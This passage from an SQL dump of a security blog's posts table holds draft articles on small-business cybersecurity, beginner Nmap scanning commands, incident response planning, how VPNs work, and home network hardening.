Policies</strong></h3>\r\nWeak passwords are an open door for cybercriminals, and they remain one of the most common vulnerabilities in businesses today. 
A strong password policy is vital for ensuring that this isn’t an easy entry point for attackers. Encourage employees to use long, complex passwords made up of letters, numbers, and symbols. It’s also helpful to establish a rule requiring passwords to be updated every few months.\r\n\r\nIn addition to strong passwords, implementing multi-factor authentication (MFA) adds an extra layer of protection. MFA requires not only a password but also another piece of information, like a code sent to a smartphone or an authentication app, before access is granted. This makes it much harder for hackers to gain unauthorized access, even if they’ve managed to steal a password.\r\n<h3>3. <strong>Secure Your Wi-Fi Network</strong></h3>\r\nA Wi-Fi network is a necessity for most businesses, but it’s also a potential vulnerability. Unsecured or poorly configured Wi-Fi can allow cybercriminals easy access to your internal systems. Begin by securing your network with strong encryption, such as WPA3. Using outdated or weaker encryption methods, like WEP, makes your network easier to crack and leaves your business exposed.\r\n\r\nAdditionally, avoid using the default passwords that come with routers and network devices. These are often well-known and easily exploitable by hackers. Changing your network’s settings to use a strong, unique password adds another layer of security. For added protection, create a separate guest network for customers and visitors, keeping your business systems and data isolated.\r\n<h3>4. <strong>Update Software Regularly</strong></h3>\r\nOutdated software is a common target for cybercriminals because it often contains known vulnerabilities that haven’t been patched. Keeping all your software up to date is one of the easiest ways to protect your business. 
This includes not only operating systems but also any applications or tools you use, such as web browsers, antivirus software, and office software.\r\n\r\nEnable automatic updates wherever possible to ensure you’re always running the latest versions. Periodically check for updates for any devices connected to your network, including routers, printers, and IoT devices. By staying on top of updates, you’re closing off potential entry points and reducing the likelihood of an attack exploiting known vulnerabilities.\r\n<h3>5. <strong>Backup Your Data</strong></h3>\r\n<img class=\"size-medium wp-image-3408 alignright\" src=\"https://infoseclabs.io/wp-content/uploads/2024/09/backup-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Data is the lifeblood of any business, and losing it can be devastating. Whether it’s through a ransomware attack, a hardware failure, or a natural disaster, the consequences of losing business-critical data are severe. That’s why it’s essential to regularly back up all important information. Ideally, backups should be stored in multiple locations, including both physical devices and the cloud, to provide redundancy.\r\n\r\nHaving backups is only useful if they work when you need them. Regularly test your backups to make sure the data can be restored without issue. In the event of an attack or data loss, quick access to your backups ensures your business can resume operations with minimal disruption, avoiding costly downtime.\r\n<h3>6. <strong>Install a Firewall and Antivirus Software</strong></h3>\r\nFirewalls and antivirus software are fundamental components of a solid cybersecurity strategy. A firewall acts as a barrier between your internal network and external threats, monitoring and controlling incoming and outgoing traffic. 
Ensure your firewall is properly configured and always kept up to date to avoid becoming an easy target for attackers looking for vulnerabilities.\r\n\r\nIn addition to a firewall, reliable antivirus and anti-malware software can help detect and remove malicious software before it causes significant damage. This software should be installed on all company devices, from desktops to mobile phones, to ensure comprehensive protection. By using these tools in combination, you’re significantly reducing the risk of unauthorized access to your systems.\r\n<h3>7. <strong>Limit Access to Sensitive Information</strong></h3>\r\nNot all employees need access to every part of your business\'s data and systems. Limiting access by implementing role-based access control (RBAC) ensures that employees can only access the information necessary for their job functions. This way, even if an employee’s account is compromised, the damage is contained to a smaller portion of your network.\r\n\r\nIn addition to limiting access, it\'s important to monitor who has access to sensitive information. Conduct regular audits to review user permissions and ensure that only authorized individuals have access to critical systems. This approach not only protects your data but also helps you comply with privacy regulations, which are becoming more stringent worldwide.\r\n<h3>8. <strong>Create a Cybersecurity Plan</strong></h3>\r\nWithout a plan, responding to a cyber incident can be chaotic and inefficient. A comprehensive cybersecurity plan outlines how your business will protect data, detect threats, respond to incidents, and recover from attacks. The plan should include roles and responsibilities for your team members, so everyone knows what to do in the event of a breach.\r\n\r\nYour plan should also cover external resources, like cybersecurity consultants or law enforcement, and detail how and when they should be contacted. 
Regularly reviewing and updating your plan is crucial as new threats emerge. Having a well-prepared, actionable plan can make all the difference in mitigating the impact of a cyberattack on your business.\r\n<h3>Don\'t Forget</h3>\r\nCybersecurity is not just for large corporations. Small businesses are increasingly becoming targets due to perceived weaknesses in their defenses. By taking proactive measures—starting with employee training and continuing through strong password policies, secure Wi-Fi networks, and comprehensive cybersecurity planning—you can significantly reduce your risk of being compromised. Staying vigilant and prepared will ensure that your business remains resilient in the face of growing cyber threats.', '', NULL, NULL, 1, 'draft', '2024-09-05 13:37:50', '2026-01-12 21:41:44', 'Information Security', 'Cybersecurity for Small Businesses: Best Practices', '', NULL),
(107, 'Getting Started with Nmap: A Comprehensive Beginner\'s Guide', 'getting-started-with-nmap-a-comprehensive-beginners-guide', '<h3><strong>Why Nmap is Essential</strong></h3>\r\nNmap is a network scanning tool that helps you discover devices, assess vulnerabilities, and understand network structures. Its capabilities extend from simple port scanning to complex network mapping, making it a fundamental tool for network administrators and security professionals.\r\n<h3><strong>Top 10 Use Cases for Nmap</strong></h3>\r\n<ol>\r\n 	<li><strong>Network Discovery</strong>\r\nNmap can scan a range of IP addresses to discover all devices connected to a network. This feature is crucial for mapping out your network and identifying which devices are active and reachable. For instance, if you\'re managing a large network, network discovery helps you keep track of all connected devices, ensuring nothing goes unnoticed.</li>\r\n 	<li><strong>Port Scanning</strong>\r\nPort scanning is one of Nmap’s most commonly used features. It allows you to determine which ports on a system are open and listening for connections. This is essential for assessing the attack surface of your network. Open ports can potentially be entry points for attackers, so identifying them helps in securing your network.</li>\r\n 	<li><strong>Service Identification</strong>\r\nBeyond just identifying open ports, Nmap also detects the services running on those ports. It can provide details about the software and its version, which is useful for understanding what is operating on your network and ensuring that outdated or vulnerable software is updated.</li>\r\n 	<li><strong>Vulnerability Assessment</strong>\r\nNmap can help identify known vulnerabilities in the services and software running on your network. By using scripts from the Nmap Scripting Engine (NSE), you can automate vulnerability checks and uncover weaknesses that need attention. 
This proactive approach is vital for preventing potential security breaches.</li>\r\n 	<li><strong>Network Mapping</strong>\r\nNmap can create visual representations of your network, showing how devices are interconnected. This network mapping helps administrators understand the network structure, identify potential bottlenecks, and optimize performance. Visualizing the network layout can also aid in troubleshooting and planning.</li>\r\n 	<li><strong>Firewall Testing</strong>\r\nTesting firewalls is crucial to ensure they are effectively protecting your network. Nmap can simulate external attacks by scanning your network from outside, helping you assess which ports and services are exposed. This information allows you to fine-tune firewall rules and enhance network security.</li>\r\n 	<li><strong>OS Fingerprinting</strong>\r\nNmap can attempt to determine the operating system of a target host based on how it responds to various probes. This information is valuable for understanding the network environment and tailoring security measures accordingly. Knowing the OS helps in applying specific patches and configurations.</li>\r\n 	<li><strong>Scriptable Automation</strong>\r\nThe Nmap Scripting Engine (NSE) allows users to write and use custom scripts for various tasks. This feature supports advanced scanning, data collection, and even exploitation. Automating these tasks can save time and improve efficiency in security assessments.</li>\r\n 	<li><strong>Penetration Testing</strong>\r\nEthical hackers and penetration testers use Nmap to identify potential entry points for attacks. By discovering weak spots in the network, they can suggest improvements and strengthen defenses. Nmap’s comprehensive scanning capabilities make it an indispensable tool for penetration testing.</li>\r\n 	<li><strong>Network Monitoring</strong>\r\nNmap can also be used for passive network monitoring. 
By analyzing network traffic and reporting on the devices and services in use, you can keep an eye on network activity without actively scanning. This ongoing monitoring helps in detecting anomalies and maintaining network health.</li>\r\n</ol>\r\n<h3><strong>Essential Nmap Commands for Beginners</strong></h3>\r\n<ol>\r\n 	<li><strong>Basic Scan</strong>\r\nCommand: <code>nmap &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Conducts a basic scan of the target with default settings.\r\n<strong>Usage</strong>: This is the simplest form of scanning, providing information about open ports and services on the target.</li>\r\n 	<li><strong>Scan Specific Ports</strong>\r\nCommand: <code>nmap -p &lt;port1,port2,...&gt; &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Scans specified ports on the target.\r\n<strong>Usage</strong>: Useful when you need to check specific ports rather than scanning all 65535 ports, which saves time and resources.</li>\r\n 	<li><strong>Aggressive Scan</strong>\r\nCommand: <code>nmap -A &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Performs a comprehensive scan including OS detection, version detection, script scanning, and traceroute.\r\n<strong>Usage</strong>: Provides detailed information about the target, making it suitable for in-depth analysis.</li>\r\n 	<li><strong>OS Detection</strong>\r\nCommand: <code>nmap -O &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Attempts to determine the operating system of the target.\r\n<strong>Usage</strong>: Knowing the OS helps in identifying potential vulnerabilities and implementing appropriate security measures.</li>\r\n 	<li><strong>Service Version Detection</strong>\r\nCommand: <code>nmap -sV &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Detects versions of services running on open ports.\r\n<strong>Usage</strong>: Helps identify outdated or vulnerable software versions that need to be updated or patched.</li>\r\n 	<li><strong>Scan a Range of IPs</strong>\r\nCommand: <code>nmap 
&lt;start-ip&gt;-&lt;end-ip&gt;</code>\r\n<strong>Purpose</strong>: Scans a range of IP addresses.\r\n<strong>Usage</strong>: Efficient for scanning a segment of a network to discover active hosts and open ports.</li>\r\n 	<li><strong>Scan Subnet</strong>\r\nCommand: <code>nmap &lt;network&gt;/CIDR</code>\r\n<strong>Purpose</strong>: Scans all IPs in a subnet.\r\n<strong>Usage</strong>: Ideal for scanning entire subnets, such as 192.168.1.0/24, to get a comprehensive view of network devices.</li>\r\n 	<li><strong>Stealth Scan (SYN Scan)</strong>\r\nCommand: <code>nmap -sS &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Performs a stealthy SYN scan.\r\n<strong>Usage</strong>: Often used because it is less likely to be detected by firewalls and intrusion detection systems.</li>\r\n 	<li><strong>UDP Scan</strong>\r\nCommand: <code>nmap -sU &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Scans for open UDP ports.\r\n<strong>Usage</strong>: Essential for identifying services running on UDP, which is crucial for a complete security assessment.</li>\r\n 	<li><strong>TCP Connect Scan</strong>\r\nCommand: <code>nmap -sT &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Performs a full TCP connection scan.\r\n<strong>Usage</strong>: Completes the TCP handshake, making it more reliable but also more detectable.</li>\r\n 	<li><strong>Scan for Specific Vulnerabilities</strong>\r\nCommand: <code>nmap --script vuln &lt;target&gt;</code>\r\n<strong>Purpose</strong>: Uses vulnerability scripts to scan for known vulnerabilities.\r\n<strong>Usage</strong>: Quickly identifies potential vulnerabilities on the target, providing a starting point for remediation.</li>\r\n</ol>\r\nBy understanding its various uses and commands, you can enhance your ability to discover vulnerabilities, map network structures, and monitor network activity. 
Whether you’re new to cybersecurity or looking to expand your toolkit, Nmap offers powerful features to help safeguard your network.\r\n<a href=\"https://infoseclabs.io/wp-content/uploads/simple-file-list/nmap_cheet_sheet_v7-3.pdf\"><span style=\"font-size: 18pt\"><strong>Download Nmap Cheat Sheet</strong></span></a>', '', NULL, NULL, 1, 'draft', '2024-08-12 21:49:28', '2026-01-12 21:41:44', 'Information Security', 'Getting Started with Nmap: A Comprehensive Beginner\'s Guide', '', NULL),
(108, 'How to Create a Cyber Incident Response Plan: A Step-by-Step Guide', 'how-to-create-a-cyber-incident-response-plan-a-step-by-step-guide', 'Cyber threats are more prevalent and sophisticated than ever before. Whether you\'re a small business owner or part of a large enterprise, having a robust Cyber Incident Response Plan (CIRP) is essential to protect your organization from potential cyberattacks. A well-structured CIRP ensures that your organization can quickly and effectively respond to security incidents, minimizing damage and ensuring business continuity. This blog post will guide you through creating an effective Cyber Incident Response Plan.\r\n<h3>Understanding the Importance of a Cyber Incident Response Plan</h3>\r\nBefore diving into the steps, it\'s crucial to understand why a CIRP is vital for your organization:\r\n<ul>\r\n 	<li><strong>Minimize Damage</strong>: A quick response can limit the impact of a cyber incident, reducing financial losses, reputational damage, and operational downtime.</li>\r\n 	<li><strong>Ensure Regulatory Compliance</strong>: Many industries have specific regulations requiring organizations to have incident response plans in place. A CIRP can help you meet these legal and regulatory requirements.</li>\r\n 	<li><strong>Protect Sensitive Data</strong>: A prompt response to a cyber incident can prevent the loss or compromise of sensitive information, including customer data, intellectual property, and financial records.</li>\r\n</ul>\r\n<h3>Step 1: Establish a Cyber Incident Response Team (CIRT)</h3>\r\nThe first step in creating a CIRP is to establish a Cyber Incident Response Team (CIRT). This team is responsible for managing and executing the response plan. Here’s how to assemble your team:\r\n<ul>\r\n 	<li><strong>Identify Key Members</strong>: Include representatives from IT, legal, public relations, human resources, and senior management. 
Ensure that each member understands their role in the event of a cyber incident.</li>\r\n 	<li><strong>Define Roles and Responsibilities</strong>: Clearly outline the responsibilities of each team member. For example, IT personnel may handle technical aspects, while the PR team manages communication with the public.</li>\r\n 	<li><strong>Provide Training</strong>: Regularly train your CIRT members on the latest cybersecurity threats and incident response procedures. Conduct mock drills to ensure they are prepared to respond effectively.</li>\r\n</ul>\r\n<h3>Step 2: Identify and Classify Potential Cyber Threats</h3>\r\nUnderstanding the types of threats your organization may face is crucial to developing an effective response plan. Common cyber threats include:\r\n<ul>\r\n 	<li><strong>Malware and Ransomware</strong>: Malicious software that can disrupt operations or lock down systems until a ransom is paid.</li>\r\n 	<li><strong>Phishing Attacks</strong>: Deceptive emails or messages designed to trick employees into revealing sensitive information or downloading malware.</li>\r\n 	<li><strong>Insider Threats</strong>: Employees or contractors who intentionally or unintentionally compromise security.</li>\r\n 	<li><strong>DDoS Attacks</strong>: Distributed Denial of Service attacks that overwhelm your network, causing it to become unavailable.</li>\r\n</ul>\r\nClassify these threats based on their potential impact and likelihood of occurrence. This classification helps prioritize your response efforts and allocate resources effectively.\r\n<h3>Step 3: Develop Incident Detection and Reporting Procedures</h3>\r\nEarly detection is critical in minimizing the impact of a cyber incident. 
Your CIRP should include detailed procedures for identifying and reporting potential incidents:\r\n<ul>\r\n 	<li><strong>Implement Monitoring Tools</strong>: Use advanced monitoring tools to detect unusual network activity, unauthorized access, or other signs of a cyber incident.</li>\r\n 	<li><strong>Establish Reporting Channels</strong>: Ensure that employees know how and where to report suspected incidents. This could be an internal hotline, a dedicated email address, or an online reporting form.</li>\r\n 	<li><strong>Define Escalation Protocols</strong>: Determine when and how incidents should be escalated to higher management or external cybersecurity experts. Escalation protocols should be clearly defined to ensure a swift response.</li>\r\n</ul>\r\n<h3>Step 4: Create a Response and Mitigation Plan</h3>\r\nOnce an incident is detected, your response plan should outline the steps to contain, mitigate, and recover from the incident. Key components include:\r\n<ul>\r\n 	<li><strong>Containment Strategies</strong>: Determine how to isolate affected systems to prevent the spread of the attack. This may involve disconnecting networks, shutting down systems, or restricting access.</li>\r\n 	<li><strong>Eradication and Recovery</strong>: Once the incident is contained, remove the threat from your systems. This may involve deleting malware, patching vulnerabilities, or restoring data from backups.</li>\r\n 	<li><strong>Post-Incident Review</strong>: After the incident is resolved, conduct a thorough review to understand what went wrong and how to prevent future incidents. Document the findings and update your CIRP accordingly.</li>\r\n</ul>\r\n<h3>Step 5: Communication and Coordination</h3>\r\nEffective communication during a cyber incident is crucial for maintaining trust and transparency. 
Your CIRP should include a communication plan that addresses:\r\n<ul>\r\n 	<li><strong>Internal Communication</strong>: Keep employees informed about the incident and the steps being taken to address it. Ensure that communication is clear and consistent to avoid panic or confusion.</li>\r\n 	<li><strong>External Communication</strong>: If necessary, inform customers, partners, and regulatory authorities about the incident. Be transparent about the impact and the measures being taken to resolve the issue.</li>\r\n 	<li><strong>Media Relations</strong>: Designate a spokesperson to handle media inquiries and public statements. A well-managed communication strategy can help protect your organization’s reputation.</li>\r\n</ul>\r\n<h3>Step 6: Test and Update Your CIRP Regularly</h3>\r\nA Cyber Incident Response Plan is not a one-time effort. It needs to be regularly tested, reviewed, and updated to remain effective:\r\n<ul>\r\n 	<li><strong>Conduct Regular Drills</strong>: Simulate cyber incidents to test your CIRP and identify any gaps or weaknesses. Use these drills to refine your response strategies and improve team coordination.</li>\r\n 	<li><strong>Review and Update</strong>: Regularly review your CIRP to ensure it aligns with the latest cybersecurity best practices and addresses emerging threats. Update the plan as necessary to reflect changes in your organization’s structure, technology, or regulatory environment.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nCreating a Cyber Incident Response Plan is a critical step in safeguarding your organization from cyber threats. By establishing a dedicated response team, identifying potential threats, developing detection and response procedures, and maintaining effective communication, you can minimize the impact of cyber incidents and ensure a swift recovery. 
Remember, a CIRP is a living document that requires ongoing attention and refinement to stay effective in an ever-evolving cybersecurity landscape.', '', NULL, NULL, 1, 'draft', '2024-08-11 23:46:14', '2026-01-12 21:41:44', 'Information Security', 'How to Create a Cyber Incident Response Plan: A Step-by-Step Guide', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(109, 'How VPNs Work: A Beginner\'s Guide', 'how-vpns-work-a-beginners-guide', 'Online privacy and security are more important than ever. You\'ve probably heard of VPNs (Virtual Private Networks) as a tool to help protect your online activity, but what exactly is a VPN, and how does it work? Let’s break it down in a way that\'s easy to understand.\r\n<h3><strong>What is a VPN?</strong></h3>\r\nA VPN, or Virtual Private Network, is a tool that protects your internet connection. It does this by masking your IP address—essentially your device\'s identifier on the internet—and encrypting your data. Think of a VPN as a secure, private tunnel that connects your device to the internet. When you\'re using a VPN, your online activity is shielded from prying eyes, whether those eyes belong to your Internet Service Provider (ISP), advertisers, or hackers.\r\n<h3><strong>How Does It Work?</strong></h3>\r\nTypically, when you connect to the internet, your data travels from your device to your ISP and then to the website or service you\'re accessing. This means your ISP can see everything you\'re doing online, and the website you\'re visiting can see your IP address, which reveals your general location. This lack of privacy can be concerning, especially when you\'re on public Wi-Fi networks, which are notoriously insecure.\r\n\r\nWhen you use a VPN, your data is first encrypted (converted into unreadable code) before it leaves your device. It then travels through a secure tunnel to a VPN server, where it is decrypted and sent to its destination. The website you’re visiting sees the IP address of the VPN server, not your own. 
This process helps protect your identity and location, giving you a degree of anonymity online.\r\n<h3><strong>Why Use a VPN?</strong></h3>\r\nVPNs offer several benefits that make them essential for anyone concerned about their online privacy and security:\r\n<ul>\r\n 	<li><strong>Enhanced Privacy</strong>: A VPN hides your IP address and encrypts your data, making it much harder for anyone to track your online activity. This is particularly important in a world where data breaches and tracking are becoming more common. Keep in mind what a VPN does not do: it does not stop tracking that happens inside your browser (cookies, logged-in accounts, browser fingerprinting), and the VPN provider itself can see your traffic. You are shifting trust from your ISP to the provider, not removing the need for trust.</li>\r\n 	<li><strong>Security on Public Wi-Fi</strong>: Public Wi-Fi networks, like those in cafes or airports, are prime targets for hackers. A VPN encrypts everything between your device and the VPN server, so someone on the same network cannot read or tamper with your traffic on that hop. Note that HTTPS already protects most web traffic; the VPN mainly adds cover for unencrypted traffic, DNS lookups, and metadata such as which sites you visit.</li>\r\n 	<li><strong>Access to Restricted Content</strong>: Many streaming services and websites restrict access based on your location. With a VPN, you can connect to a server in a different country, allowing you to access content that might otherwise be unavailable to you.</li>\r\n 	<li><strong>Avoid ISP Throttling</strong>: Some ISPs intentionally slow down your internet connection based on your activity, such as streaming or torrenting. A VPN hides your activity from your ISP, preventing them from throttling your connection based on what you are doing (an ISP can still slow down VPN traffic as a whole).</li>\r\n</ul>\r\n<h3><strong>Understanding Advanced VPN Features</strong></h3>\r\nAs you delve deeper into the world of VPNs, you\'ll find that many providers offer advanced features that can enhance your online experience:\r\n<ul>\r\n 	<li><strong>Split Tunneling</strong>: This feature allows you to choose which apps use the VPN and which ones connect directly to the internet. For example, you might want your banking app to use the VPN while your streaming app bypasses it to maximize speed. Remember that anything excluded from the tunnel is exposed exactly as if you had no VPN at all.</li>\r\n 	<li><strong>Ad and Malware Blocking</strong>: Some VPNs offer built-in ad blockers that prevent unwanted ads and pop-ups. 
Additionally, advanced versions of these features can block trackers and even malicious websites before they can do any harm.</li>\r\n 	<li><strong>Kill Switch</strong>: One of the most critical features of a VPN is the kill switch. If your VPN connection drops unexpectedly, the kill switch automatically disconnects your device from the internet. This ensures that your real IP address and data aren\'t accidentally exposed.</li>\r\n</ul>\r\n<h3><strong>Encryption and VPN Protocols</strong></h3>\r\nEncryption is at the heart of how VPNs protect your data. The two most common encryption algorithms used by VPNs are AES-256 and ChaCha20. Both are considered highly secure and are widely used in the industry.\r\n<ul>\r\n 	<li><strong>AES-256</strong>: This is a type of symmetric encryption, meaning the same key is used to encrypt and decrypt data. It’s known for its robustness and is used by governments and security agencies worldwide.</li>\r\n 	<li><strong>ChaCha20</strong>: Another symmetric encryption method, ChaCha20 is known for its speed and efficiency. It’s particularly useful in situations where high performance is essential.</li>\r\n</ul>\r\nIn addition to encryption, VPNs rely on protocols to establish secure connections. The most popular protocols today are WireGuard and OpenVPN.\r\n<ul>\r\n 	<li><strong>WireGuard</strong>: This is a newer protocol known for its simplicity, speed, and security. It’s becoming the standard for modern VPNs.</li>\r\n 	<li><strong>OpenVPN</strong>: While older, OpenVPN is still widely used and respected for its reliability and flexibility. It allows users to choose between different transmission protocols, such as TCP (Transmission Control Protocol) and UDP (User Datagram Protocol), depending on their needs.</li>\r\n</ul>\r\n<h3><strong>Choosing the Right VPN</strong></h3>\r\nWith so many VPN providers available, choosing the right one can be challenging. 
Here are some key factors to consider:\r\n<ul>\r\n 	<li><strong>Reputation and Privacy Policy</strong>: Make sure the VPN provider has a solid reputation and a clear, transparent privacy policy. Some VPNs have been caught logging user data, which defeats the purpose of using one in the first place. Look for a no-logs policy that has been verified by an independent audit, and be cautious with free services, whose business model may depend on the very data you are trying to protect.</li>\r\n 	<li><strong>Server Network</strong>: The more servers a VPN provider has, the better your chances of finding a fast, reliable connection. Look for providers with servers in the regions you\'re most likely to connect to.</li>\r\n 	<li><strong>Extra Features</strong>: Consider what additional features are important to you. Do you need split tunneling, ad-blocking, or a dedicated IP address? Some providers offer these features as standard, while others may charge extra.</li>\r\n 	<li><strong>Value for Money</strong>: VPN prices can vary significantly, so it’s worth shopping around. Some providers offer discounts for long-term subscriptions, but make sure the service meets your needs before committing.</li>\r\n</ul>\r\n<h3><strong>The Future of VPNs and Encryption</strong></h3>\r\nWhile current encryption methods used by VPNs are considered secure, the rise of quantum computing poses a potential threat. Quantum computers could, in theory, break the public-key algorithms (such as RSA and elliptic-curve Diffie-Hellman) that VPN protocols use to agree on keys when the tunnel is set up. The symmetric ciphers that protect the traffic itself, AES-256 and ChaCha20, are far less affected: a quantum search attack roughly halves their effective key strength, and 256-bit keys remain well out of reach. The practical worry is that traffic recorded today could be decrypted later once the key exchange can be broken. Although this technology is still in its early stages, it’s a good idea to stay informed about developments in post-quantum cryptography, which is being designed to replace the vulnerable key-exchange step.\r\n<h3><strong>Overcoming VPN Detection</strong></h3>\r\nNot everyone is thrilled with the idea of VPNs. Governments, corporations, and other entities often try to block VPN traffic to enforce censorship or maintain control over what can be accessed online. 
They do this through various methods, such as comparing your browser\'s time zone with the location of your IP address, checking known VPN server IP addresses, and even analyzing the behavior of network traffic.\r\n\r\nTo combat this, some VPNs offer obfuscation techniques that disguise VPN traffic as regular internet traffic. DNS leak protection is a different kind of safeguard: it makes sure your DNS lookups travel through the tunnel instead of going to your ISP\'s resolver, so the ISP cannot see which domains you visit while the VPN is up. It does not hide the fact that you are using a VPN, and a misconfigured client can still leak DNS or IPv6 traffic outside the tunnel, so test for leaks after connecting. Finally, regular updates to a VPN’s server network can keep you ahead of detection efforts.\r\n\r\nA VPN is a powerful tool that can protect your privacy, enhance your security, and give you access to a broader range of online content. By understanding how VPNs work and what features to look for, you can make an informed decision about which VPN is right for you. Whether you\'re concerned about online privacy, want to secure your connection on public Wi-Fi, or need to bypass geo-restrictions, a VPN is a versatile solution that can meet your needs.\r\n\r\nIf you\'re ready to take the plunge into the world of VPNs, remember to choose a provider that aligns with your needs and offers robust security features. And as technology continues to evolve, staying informed about the latest advancements in VPN technology and encryption will ensure that you remain protected in the digital age.', '', NULL, NULL, 1, 'draft', '2024-08-11 02:38:43', '2026-01-12 21:41:44', 'Information Security', 'How VPNs Work: A Beginner\'s Guide', '', NULL),
(110, 'How to Secure Your Home Network', 'how-to-secure-your-home-network', 'Securing your home network is no longer a luxury—it’s a necessity. With an ever-increasing number of devices connected to the internet, from smartphones and laptops to smart appliances and home security systems, the potential for cyber threats has grown exponentially. A compromised network can lead to severe consequences, including data breaches, identity theft, and unauthorized access to personal information. This guide provides practical and detailed steps to help you secure your home network effectively and protect your digital life.\r\n<h3>Understanding the Importance of Network Security</h3>\r\nYour home network serves as the digital gateway to your personal and family information. It not only connects your devices to the internet but also allows them to communicate with each other. However, if your network is not properly secured, it can become an easy target for cybercriminals. Here are some compelling reasons why securing your home network is crucial:\r\n<ul>\r\n 	<li><strong>Protection of Personal Information</strong>: A compromised network can lead to unauthorized access to sensitive data, such as financial details, personal emails, and confidential documents. This information can be exploited for financial gain, leading to identity theft and fraud.</li>\r\n 	<li><strong>Preventing Unauthorized Access</strong>: An unsecured network is vulnerable to unauthorized users who can connect to it and potentially use your internet connection for illegal activities, which could make you liable.</li>\r\n 	<li><strong>Securing Smart Devices (IoT)</strong>: The rise of the Internet of Things (IoT) has introduced numerous smart devices into homes, from smart thermostats to voice-activated assistants. These devices often have weaker security protocols, making them prime targets for hackers. 
Securing your network helps protect these devices from being hijacked or exploited.</li>\r\n</ul>\r\n<h3>Steps to Secure Your Home Network</h3>\r\nTo safeguard your home network from cyber threats, follow these detailed steps:\r\n<h4>1. Change Default Router Settings</h4>\r\nRouters typically come with default settings that are well-known to hackers, making them easy targets. To enhance your network\'s security, start by changing the following:\r\n<ul>\r\n 	<li><strong>SSID (Network Name)</strong>: The SSID, or Service Set Identifier, is the name of your wireless network. Change the default SSID to something unique that doesn’t reveal personal information or the router’s brand, which could give hackers clues about potential vulnerabilities. Avoid using identifiable names like your address or family name.</li>\r\n 	<li><strong>Default Passwords</strong>: Routers come with default administrative passwords, which are often simple and widely known. Change this password immediately to a strong, unique one that includes a mix of uppercase and lowercase letters, numbers, and symbols. Aim for a password with at least 12-16 characters to ensure robust security. The router\'s admin password and the Wi-Fi passphrase are two different secrets; change both, and make the Wi-Fi passphrase long as well, because an attacker who records the WPA2 handshake can try to guess it offline at high speed. Also disable Wi-Fi Protected Setup (WPS) if your router offers it, as its PIN mechanism has well-known weaknesses.</li>\r\n</ul>\r\n<h4>2. Enable Network Encryption</h4>\r\nEncryption is essential for protecting the data transmitted over your network from being intercepted by unauthorized users. Most modern routers support advanced encryption protocols. Ensure that your router is configured to use one of the following:\r\n<ul>\r\n 	<li><strong>WPA2</strong>: The WPA2 (Wi-Fi Protected Access 2) protocol is the most widely used encryption method and provides a good level of security. It encrypts the data traveling between your router and connected devices, making it difficult for outsiders to intercept. Make sure it is set to WPA2 with AES (CCMP); never use WEP or WPA/TKIP, which are broken and offer little real protection.</li>\r\n 	<li><strong>WPA3</strong>: WPA3 is the latest encryption standard, offering even stronger protection than WPA2. 
It provides enhanced security against password-guessing attacks and should be used if your router supports it.</li>\r\n</ul>\r\n<h4>3. Create a Guest Network</h4>\r\nA guest network is a separate network for visitors who need internet access. This isolates their devices from your main network, preventing them from accessing your personal devices and shared files.\r\n<ul>\r\n 	<li><strong>Benefits of a Guest Network</strong>: By setting up a guest network, you can ensure that any potential malware on guest devices does not spread to your primary network. Additionally, it adds a layer of privacy, as guests won’t be able to see or interact with your personal devices.</li>\r\n</ul>\r\n<h4>4. Keep Your Router’s Firmware Updated</h4>\r\nRouter manufacturers frequently release firmware updates to patch security vulnerabilities and improve performance. Keeping your router’s firmware up to date is crucial for maintaining security.\r\n<ul>\r\n 	<li><strong>Automatic Updates</strong>: Some routers offer the option to automatically install updates. Enable this feature if available, so you don’t have to manually check for updates regularly.</li>\r\n</ul>\r\n<h4>5. Use Strong Passwords for All Devices</h4>\r\nEach device connected to your network should be protected with a strong, unique password. This includes not only your computers and smartphones but also any IoT devices like smart locks, cameras, and home assistants.\r\n<ul>\r\n 	<li><strong>Password Management</strong>: Consider using a password manager to create and store complex passwords. Avoid using easily guessable passwords like \"123456\" or \"password.\" A strong password should be at least 12 characters long and include a mix of letters, numbers, and symbols.</li>\r\n</ul>\r\n<h4>6. Disable Remote Management</h4>\r\nMany routers offer a remote management feature that allows you to configure your router settings from anywhere. 
Unless you need this feature, it’s best to disable it, as it exposes the router’s admin interface to the whole internet, where automated scanners can find it and attack it with password guessing or unpatched firmware bugs. If you genuinely need remote access, restrict it to specific source IP addresses or reach the router over a VPN instead.\r\n<h4>7. Enable Firewall Protection</h4>\r\nFirewalls are a critical defense mechanism that helps block unauthorized access to your network. Most routers come with built-in firewall protection, which should be enabled to provide an additional layer of security. Review any port-forwarding rules you have added, since each one punches a hole through that protection.\r\n<ul>\r\n 	<li><strong>Software Firewalls</strong>: In addition to your router’s firewall, consider using a software firewall on your devices. This double-layered protection can help block malicious traffic and prevent unauthorized access.</li>\r\n</ul>\r\n<h4>8. Monitor Connected Devices</h4>\r\nRegularly monitoring the devices connected to your network is an effective way to detect unauthorized access. Most routers provide an admin interface where you can view a list of connected devices.\r\n<ul>\r\n 	<li><strong>Taking Action</strong>: If you notice any unfamiliar devices connected to your network, disconnect them immediately and change your Wi-Fi password to prevent future access.</li>\r\n</ul>\r\n<h4>9. Limit DHCP Leases</h4>\r\nDynamic Host Configuration Protocol (DHCP) automatically assigns IP addresses to devices on your network. By limiting the number of DHCP leases, you can control how many devices are allowed to connect to your network simultaneously.\r\n<ul>\r\n 	<li><strong>Set a Maximum Number</strong>: Adjust the DHCP settings in your router’s admin interface to set a maximum number of devices that can connect to your network. This can help you keep an inventory of what is on your network, but treat it as housekeeping rather than a security control: a device can simply assign itself a static IP address in your subnet and bypass the lease limit entirely, so it will not keep out anyone who already has your Wi-Fi passphrase.</li>\r\n</ul>\r\n<h3>Advanced Security Measures</h3>\r\nFor those seeking additional layers of protection, consider implementing the following advanced security measures:\r\n<ul>\r\n 	<li><strong>Use a VPN (Virtual Private Network)</strong>: A VPN encrypts your internet connection, providing an extra layer of privacy and security. 
